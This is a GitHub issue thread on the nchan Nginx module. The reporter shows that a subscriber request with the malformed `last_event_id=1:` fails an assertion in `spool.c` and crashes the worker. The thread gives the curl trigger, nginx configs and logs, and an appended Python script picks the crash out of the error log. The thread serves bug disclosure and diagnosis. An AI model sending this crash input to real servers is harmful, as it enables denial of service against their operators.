slact / nchan

Fast, horizontally scalable, multiprocess pub/sub queuing server and proxy for HTTP, long-polling, Websockets and EventSource (SSE), powered by Nginx.
https://nchan.io/

Using invalid msgid for DoS attacks? #670

Open Shonke opened 1 year ago

Shonke commented 1 year ago

I tested and found that an invalid msgid will cause the process to exit.

I am using nginx-mod-nchan installed from the APT repositories: libnginx-mod-nchan/testing,now 1:1.3.6+dfsg-2 amd64 [installed]

term1 # nginx -c /root/test1.conf
2023/06/23 21:10:02 [notice] 3938991#3938991: using the "epoll" event method
2023/06/23 21:10:02 [notice] 3938991#3938991: nginx/1.22.1
2023/06/23 21:10:02 [notice] 3938991#3938991: OS: Linux 6.1.0-9-amd64
2023/06/23 21:10:02 [notice] 3938991#3938991: getrlimit(RLIMIT_NOFILE): 5000:65535
2023/06/23 21:10:02 [notice] 3938991#3938991: start worker processes
2023/06/23 21:10:02 [notice] 3938991#3938991: start worker process 3938992
2023/06/23 21:10:13 [info] 3938992#3938992: *1 client prematurely closed connection, client: 127.0.0.1, server: _, request: "GET /sub?last_event_id=1: HTTP/1.1", host: "127.0.0.1:8200"
nginx: worker process: ././src/store/spool.c:479: spool_fetch_msg: Assertion `spool->msg_status == MSG_INVALID' failed.
2023/06/23 21:10:14 [notice] 3938991#3938991: signal 17 (SIGCHLD) received from 3938992
2023/06/23 21:10:14 [alert] 3938991#3938991: worker process 3938992 exited on signal 6
2023/06/23 21:10:14 [notice] 3938991#3938991: start worker process 3939157

^C2023/06/23 21:12:27 [notice] 3939157#3939157: signal 2 (SIGINT) received, exiting
2023/06/23 21:12:27 [notice] 3938991#3938991: signal 2 (SIGINT) received, exiting
2023/06/23 21:12:27 [info] 3939157#3939157: epoll_wait() failed (4: Interrupted system call)
2023/06/23 21:12:27 [notice] 3939157#3939157: exiting
2023/06/23 21:12:27 [notice] 3939157#3939157: exit
2023/06/23 21:12:27 [notice] 3938991#3938991: signal 17 (SIGCHLD) received from 3939157
2023/06/23 21:12:27 [notice] 3938991#3938991: worker process 3939157 exited with code 0
2023/06/23 21:12:27 [notice] 3938991#3938991: exit
term2 # curl "http://127.0.0.1:8200/sub?last_event_id=1:"
^C
term2 # curl "http://127.0.0.1:8200/sub?last_event_id=1:"
curl: (52) Empty reply from server
term2 # curl "http://127.0.0.1:8200/sub?last_event_id=1:"
^C
term2 # curl "http://127.0.0.1:8200/sub?last_event_id=1:"
curl: (52) Empty reply from server
term2 #

nginx.conf:

daemon off;
worker_processes 1;
master_process on;

error_log /dev/stderr info;
pid /var/run/nginx1.pid;

load_module modules/ngx_nchan_module.so;
events {}

http {
  server {
    listen 8200;
    server_name _ default;
    location /sub {
      nchan_subscriber ;
      nchan_channel_id test1;
    }
  }
}

slact commented 11 months ago

please add

    location /nchan_stub_status { 
      nchan_stub_status; 
    } 

and show me the output of curl http://127.0.0.1:8200/nchan_stub_status

Shonke commented 11 months ago

> please add
>
>     location /nchan_stub_status {
>       nchan_stub_status;
>     }
>
> and show me the output of curl http://127.0.0.1:8200/nchan_stub_status

I will try again using the latest version

the nginx configuration

daemon off;
worker_processes 1;
master_process on;

error_log /dev/stderr info;
pid /var/run/nginx1.pid;

load_module modules/ngx_nchan_module.so;

events {}

http {
  server {
    listen 8200;
    server_name _ default;

    location /sub {
      nchan_subscriber ;
      nchan_channel_id test1;
    }

    location /nchan_stub_status {
      nchan_stub_status;
    }
  }
}

nginx output

term1 ~# nginx -c /root/test1.conf
2023/07/26 14:40:21 [notice] 2751287#2751287: using the "epoll" event method
2023/07/26 14:40:21 [notice] 2751287#2751287: nginx/1.22.1
2023/07/26 14:40:21 [notice] 2751287#2751287: OS: Linux 6.1.0-9-amd64
2023/07/26 14:40:21 [notice] 2751287#2751287: getrlimit(RLIMIT_NOFILE): 5000:65535
2023/07/26 14:40:21 [notice] 2751287#2751287: start worker processes
2023/07/26 14:40:21 [notice] 2751287#2751287: start worker process 2751288

2023/07/26 14:40:41 [info] 2751288#2751288: *1 client 127.0.0.1 closed keepalive connection
2023/07/26 14:41:01 [info] 2751288#2751288: *3 client 127.0.0.1 closed keepalive connection
2023/07/26 14:41:06 [info] 2751288#2751288: *2 client prematurely closed connection, client: 127.0.0.1, server: _, request: "GET /sub?last_event_id=1: HTTP/1.1", host: "127.0.0.1:8200"
2023/07/26 14:41:18 [info] 2751288#2751288: *5 client 127.0.0.1 closed keepalive connection
2023/07/26 14:41:23 [info] 2751288#2751288: *4 client prematurely closed connection, client: 127.0.0.1, server: _, request: "GET /sub?last_event_id=1: HTTP/1.1", host: "127.0.0.1:8200"
nginx: worker process: ././src/store/spool.c:479: spool_fetch_msg: Assertion `spool->msg_status == MSG_INVALID' failed.
2023/07/26 14:41:24 [notice] 2751287#2751287: signal 17 (SIGCHLD) received from 2751288
2023/07/26 14:41:24 [alert] 2751287#2751287: worker process 2751288 exited on signal 6
2023/07/26 14:41:24 [notice] 2751287#2751287: start worker process 2752233
2023/07/26 14:41:27 [info] 2752233#2752233: *7 client 127.0.0.1 closed keepalive connection

^C2023/07/26 14:42:13 [notice] 2751287#2751287: signal 2 (SIGINT) received, exiting
2023/07/26 14:42:13 [notice] 2752233#2752233: signal 2 (SIGINT) received, exiting
2023/07/26 14:42:13 [notice] 2752233#2752233: exiting
2023/07/26 14:42:13 [notice] 2752233#2752233: exit
2023/07/26 14:42:13 [notice] 2751287#2751287: signal 17 (SIGCHLD) received from 2752233
2023/07/26 14:42:13 [notice] 2751287#2751287: worker process 2752233 exited with code 0
2023/07/26 14:42:13 [notice] 2751287#2751287: exit

curl terminal

term2 ~# curl "http://127.0.0.1:8200/sub?last_event_id=1:"
^C⏎
term2 ~ [SIGINT]# curl "http://127.0.0.1:8200/sub?last_event_id=1:"
^C⏎
term2 ~ [SIGINT]# curl "http://127.0.0.1:8200/sub?last_event_id=1:"
curl: (52) Empty reply from server
term2 ~ [52]#

stub_status info

term3 ~# # After nginx startup 
term3 ~# curl http://127.0.0.1:8200/nchan_stub_status
total published messages: 0
stored messages: 0
shared memory used: 16K
shared memory limit: 131072K
channels: 0
subscribers: 0
redis pending commands: 0
redis connected servers: 0
redis unhealthy upstreams: 0
total redis commands sent: 0
total interprocess alerts received: 0
interprocess alerts in transit: 0
interprocess queued alerts: 0
total interprocess send delay: 0
total interprocess receive delay: 0
nchan version: 1.3.6
term3 ~#
term3 ~# # Subscribe using curl
term3 ~# curl http://127.0.0.1:8200/nchan_stub_status
total published messages: 0
stored messages: 0
shared memory used: 20K
shared memory limit: 131072K
channels: 1
subscribers: 1
redis pending commands: 0
redis connected servers: 0
redis unhealthy upstreams: 0
total redis commands sent: 0
total interprocess alerts received: 0
interprocess alerts in transit: 0
interprocess queued alerts: 0
total interprocess send delay: 0
total interprocess receive delay: 0
nchan version: 1.3.6
term3 ~#
term3 ~#
term3 ~# # Interrupt curl subscription with ctrl+c
term3 ~# curl http://127.0.0.1:8200/nchan_stub_status
total published messages: 0
stored messages: 0
shared memory used: 20K
shared memory limit: 131072K
channels: 1
subscribers: 1
redis pending commands: 0
redis connected servers: 0
redis unhealthy upstreams: 0
total redis commands sent: 0
total interprocess alerts received: 0
interprocess alerts in transit: 0
interprocess queued alerts: 0
total interprocess send delay: 0
total interprocess receive delay: 0
nchan version: 1.3.6
term3 ~#
term3 ~# # After using curl subscription for the third time
term3 ~# curl http://127.0.0.1:8200/nchan_stub_status
total published messages: 0
stored messages: 0
shared memory used: 20K
shared memory limit: 131072K
channels: 0
subscribers: 0
redis pending commands: 0
redis connected servers: 0
redis unhealthy upstreams: 0
total redis commands sent: 0
total interprocess alerts received: 0
interprocess alerts in transit: 0
interprocess queued alerts: 0
total interprocess send delay: 0
total interprocess receive delay: 0
nchan version: 1.3.6
term3 ~#
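
The crash signature in the logs above can be picked out of an nginx error log mechanically. The following is an added example, not part of the original thread or of nchan: it pairs each "exited on signal" alert with the assertion printed just before it and with the `last_event_id` values the dead worker had logged. The function name and record layout are assumptions of this sketch; the sample lines are copied from the report.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Error-log lines copied from the report above (error_log at "info" level).
SAMPLE_LOG = '''\
2023/07/26 14:41:06 [info] 2751288#2751288: *2 client prematurely closed connection, client: 127.0.0.1, server: _, request: "GET /sub?last_event_id=1: HTTP/1.1", host: "127.0.0.1:8200"
2023/07/26 14:41:23 [info] 2751288#2751288: *4 client prematurely closed connection, client: 127.0.0.1, server: _, request: "GET /sub?last_event_id=1: HTTP/1.1", host: "127.0.0.1:8200"
nginx: worker process: ././src/store/spool.c:479: spool_fetch_msg: Assertion `spool->msg_status == MSG_INVALID' failed.
2023/07/26 14:41:24 [notice] 2751287#2751287: signal 17 (SIGCHLD) received from 2751288
2023/07/26 14:41:24 [alert] 2751287#2751287: worker process 2751288 exited on signal 6
2023/07/26 14:42:13 [notice] 2751287#2751287: worker process 2752233 exited with code 0
'''

ENTRY = re.compile(r'^(\S+ \S+) \[(\w+)\] (\d+)#\d+: (.*)$')
REQUEST = re.compile(r'client: (\S+), server: .*?request: "\S+ (\S+) HTTP')
ASSERT = re.compile(r"^nginx: worker process: (\S+): (\w+): Assertion `(.+)' failed\.$")
ABORT = re.compile(r'worker process (\d+) exited on signal (\d+)')

def find_worker_aborts(log_text):
    """Return one record per worker killed by a signal, with the assertion
    printed just before it and the last_event_id values that worker logged."""
    seen_ids = {}        # worker pid -> [(client, last_event_id), ...]
    last_assert = None   # assertion lines carry no pid or timestamp
    aborts = []
    for line in log_text.splitlines():
        m = ASSERT.match(line)
        if m:
            last_assert = {"where": m.group(1), "func": m.group(2), "expr": m.group(3)}
            continue
        m = ENTRY.match(line)
        if not m:
            continue
        when, _level, pid, msg = m.groups()
        req = REQUEST.search(msg)
        if req:
            query = parse_qs(urlsplit(req.group(2)).query, keep_blank_values=True)
            for value in query.get("last_event_id", []):
                seen_ids.setdefault(pid, []).append((req.group(1), value))
        dead = ABORT.search(msg)
        if dead:
            aborts.append({"time": when, "pid": dead.group(1),
                           "signal": int(dead.group(2)), "assertion": last_assert,
                           "last_event_ids": seen_ids.get(dead.group(1), [])})
            last_assert = None
    return aborts

if __name__ == "__main__":
    for abort in find_worker_aborts(SAMPLE_LOG):
        print(abort)
```

In the logs above only the interrupted requests were written before the abort, so the values reported are those the worker logged earlier, not necessarily the request in flight when it died.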